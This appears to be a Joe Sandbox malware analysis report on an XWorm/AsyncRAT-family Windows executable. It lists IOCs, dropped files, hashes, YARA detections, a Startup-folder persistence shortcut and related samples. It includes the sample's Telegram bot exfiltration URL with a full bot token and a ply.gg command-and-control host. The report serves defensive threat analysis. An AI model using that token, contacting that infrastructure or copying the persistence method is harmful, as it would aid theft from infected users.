https://contoso.com/ | powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2235529090.000001535232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2330121656.000001921C08F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2470760532.000001A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.co | powershell.exe, 00000002.00000002.2242258397.000001535A9AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.mic | powershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2686027389.000002DDB9CAB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micft.cMicRosof | powershell.exe, 00000005.00000002.2347323496.0000019224955000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2686027389.000002DDB9CAB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2219535625.00000153422C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA1691000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nt.C | powershell.exe, 0000000D.00000002.2690372644.000002DDB9EB8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | NzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2219535625.00000153422C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA1691000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=63786 | NzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
147.185.221.21 | paul-vocational.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1512625
Start date and time: 2024-09-17 17:24:30 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NzEsfIiAc0.exe (renamed because the original name is a hash value)
Original Sample Name: 0b80b6d2e6b7330c1f917dc01d612f6f314630edc8d05f3831689865990dcba5.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@13/20@2/2
EGA Information:
• Successful, ratio: 20%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 43
• Number of non-executed functions: 7
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1280 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1816 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5912 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6920 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• VT rate limit hit for: NzEsfIiAc0.exe
Time | Type | Description
11:25:39 | API Interceptor | 52x Sleep call for process: powershell.exe modified
11:26:36 | API Interceptor | 168859x Sleep call for process: NzEsfIiAc0.exe modified
17:26:34 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Y666Gn09a1.exe | malicious | XWorm |
 | MV. VISHVA EKTA - VESSEL PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger |
 | ship particulars_M.V FAROUK M.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger |
 | Invoice Payment.exe | malicious | Snake Keylogger, VIP Keylogger |
 | hesaphareketi-01_pdf.exe | malicious | Snake Keylogger, VIP Keylogger |
 | https://cdnnombd.elementor.cloud/ca.html | malicious | Unknown |
 | Quotation QT-433.scr.exe | malicious | Snake Keylogger, VIP Keylogger |
 | Shipping Document.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger |
 | OTPAuthenticator.wsf | malicious | AsyncRAT |
 | TT USD 170,196 - 16.9.2024.exe | malicious | Snake Keylogger, VIP Keylogger |
147.185.221.21 | Y666Gn09a1.exe | malicious | XWorm |
 | Uhj9qfwbYG.exe | malicious | AsyncRAT, XWorm |
 | WIN CHANGER 2.3.exe | malicious | XWorm |
 | jj7svxNeaQ.exe | malicious | XWorm |
 | PCCooker2.0_x64.exe | malicious | AsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRat |
 | JFhDGHXmW6.exe | malicious | Unknown |
 | N7bEDDO8u6.exe | malicious | Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm |
 | N7bEDDO8u6.exe | malicious | Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm |
 | SenditIllrunitinmyvirtualmachineinsidemyvirtualmachine.bat | malicious | Unknown |
 | Image Logger Installer.exe | malicious | AsyncRAT, XWorm |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.telegram.org | Y666Gn09a1.exe | malicious | XWorm | 149.154.167.220
 | MV. VISHVA EKTA - VESSEL PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | ship particulars_M.V FAROUK M.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Invoice Payment.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | hesaphareketi-01_pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | https://cdnnombd.elementor.cloud/ca.html | malicious | Unknown | 149.154.167.220
 | Quotation QT-433.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Shipping Document.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
 | OTPAuthenticator.wsf | malicious | AsyncRAT | 149.154.167.220
 | TT USD 170,196 - 16.9.2024.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | Y666Gn09a1.exe | malicious | XWorm | 149.154.167.220
 | Unlock_Tool_5.8.exe | malicious | Vidar | 149.154.167.99
 | file.exe | malicious | LummaC, Vidar | 149.154.167.99
 | file.exe | malicious | LummaC, Vidar | 149.154.167.99
 | file.exe | malicious | LummaC, Vidar | 149.154.167.99
 | file.exe | malicious | LummaC, Vidar | 149.154.167.99
 | MV. VISHVA EKTA - VESSEL PARTICULARS.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | ship particulars_M.V FAROUK M.pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Invoice Payment.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | http://web.telagram.vip/ | malicious | Unknown | 149.154.167.99
SALSGIVERUS | Y666Gn09a1.exe | malicious | XWorm | 147.185.221.21
 | file.exe | malicious | XWorm | 147.185.221.22
 | stub.exe | malicious | AsyncRAT | 147.185.221.22
 | b34J4bxnmN.exe | malicious | Njrat | 147.185.221.18
 | 01koiHnedL.exe | malicious | Njrat | 147.185.221.18
 | nPIv2AODg2.exe | malicious | XWorm | 147.185.221.19
 | WLO9Pkkle0.exe | malicious | XWorm | 147.185.221.22
 | uUY8turU3x.exe | malicious | AsyncRAT, XWorm | 147.185.221.22
 | wB5Gc9RKzG.exe | malicious | XWorm | 147.185.221.22
 | Uhj9qfwbYG.exe | malicious | AsyncRAT, XWorm | 147.185.221.21
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | 5kUoor36qV.ps1 | malicious | Unknown | 149.154.167.220
 | Y666Gn09a1.exe | malicious | XWorm | 149.154.167.220
 | 1726581965845c2fe68a8cab55e569fc6397face189f7761140e1d40ddcdf40e0f007b43ac990.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer | 149.154.167.220
 | Solicitud De Presupuesto 09-16-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 149.154.167.220
 | U00b7pdf.vbs | malicious | GuLoader, Lokibot | 149.154.167.220
 | Zahteva za prora#U010dun 09-17-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 149.154.167.220
 | Label_PL001292992.vbs | malicious | Remcos, PureLog Stealer | 149.154.167.220
 | AG#976832.vbs | malicious | AsyncRAT | 149.154.167.220
 | Request for budget 09-17-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 149.154.167.220
 | Solicitud De Presupuesto 09-16-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 149.154.167.220
                                                                  No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Reputation: high, very likely benign file
Preview: @...e...........................................................

Process: C:\Users\user\Desktop\NzEsfIiAc0.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 29
Entropy (8bit): 3.598349098128234
Encrypted: false
SSDEEP: 3:rRSFYJKXzovNsra:EFYJKDoWra
MD5: 2C11513C4FAB02AEDEE23EC05A2EB3CC
SHA1: 59177C177B2546FBD8EC7688BAD19D08D32640DE
SHA-256: BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
SHA-512: 08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
Malicious: false
Reputation: moderate, very likely benign file
Preview: ....### explorer ###..[WIN]r

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\Desktop\NzEsfIiAc0.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Sep 17 14:26:31 2024, mtime=Tue Sep 17 14:26:31 2024, atime=Tue Sep 17 14:26:31 2024, length=40960, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):767
                                                                  Entropy (8bit):5.018661589852222
                                                                  Encrypted:false
                                                                  SSDEEP:12:8E24Qpnu8Ch70lXIsY//Ct+8L7J7pjAL+Hkip5P7zmV:8+YDk0lXUi7JNALFgxm
                                                                  MD5:4B3DD15399D5A236C0605B9C2EB8D93E
                                                                  SHA1:F3BFC60DE5C0B8116054C1F33986F886594A7BF0
                                                                  SHA-256:A60E013DB73E12FE05FCC0484475C6B842D400B0E6BF483A8735EF9408CFD367
                                                                  SHA-512:CF6B7ABC5010354274DA5D6408E4C0FC3F5EB9F81D16109711030B675BF73F01ECFF33DABBBB592DC0A23682F9CD19741C87C7CF3F5438CA313E3331F8DD886B
                                                                  Malicious:false
                                                                  Preview:L..................F.... ...................................................v.:..DG..Yr?.D..U..k0.&...&.......$..S...Y..................t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<21Y0{...........................^.A.p.p.D.a.t.a...B.V.1.....1Y.{..Roaming.@......EW<21Y.{..../......................-}.R.o.a.m.i.n.g.....b.2.....1YP{ .XClient.exe.H......1YP{1YP{...........................-}.X.C.l.i.e.n.t...e.x.e.......\...............-.......[...........*.......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......367706...........hT..CrF.f4... ...-.u...-...-$..hT..CrF.f4... ...-.u...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                  Process:C:\Users\user\Desktop\NzEsfIiAc0.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):5.566168736562233
                                                                  Encrypted:false
                                                                  SSDEEP:768:e3sFxMCWMqmjnkRbF6Qas7j5JOFWPX9tj6cOMhKadodV:e3sFxzrIJvarF09tj6cOM8Mor
                                                                  MD5:BFDF788A451CF345E09E7646734F4666
                                                                  SHA1:0729903458944361B593EE6EF120DE0ECA8913B3
                                                                  SHA-256:0B80B6D2E6B7330C1F917DC01D612F6F314630EDC8D05F3831689865990DCBA5
                                                                  SHA-512:48DDEB385413BFC7DF293D8D1A0D634955C5E236E071C88AC97A51213195BF792BBA4F65B19FCF7E54DD9F1CAC126E9ED95C663827D3CEB8197076166169BDF5
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!..f............................>.... ........@.. ....................................@....................................S.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H.......L[...X............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):5.566168736562233
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:NzEsfIiAc0.exe
                                                                  File size:40'960 bytes
                                                                  MD5:bfdf788a451cf345e09e7646734f4666
                                                                  SHA1:0729903458944361b593ee6ef120de0eca8913b3
                                                                  SHA256:0b80b6d2e6b7330c1f917dc01d612f6f314630edc8d05f3831689865990dcba5
                                                                  SHA512:48ddeb385413bfc7df293d8d1a0d634955c5e236e071c88ac97a51213195bf792bba4f65b19fcf7e54dd9f1cac126e9ed95c663827d3ceb8197076166169bdf5
                                                                  SSDEEP:768:e3sFxMCWMqmjnkRbF6Qas7j5JOFWPX9tj6cOMhKadodV:e3sFxzrIJvarF09tj6cOM8Mor
                                                                  TLSH:60035C447BD44221D6FEBFFA59B3A2060730F607CA13D78E08C5A99A6F37B8449153D6
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!..f............................>.... ........@.. ....................................@................................
                                                                  Icon Hash:00928e8e8686b000
                                                                  Entrypoint:0x40b43e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x66B69821 [Fri Aug 9 22:28:49 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb3e8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x4d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
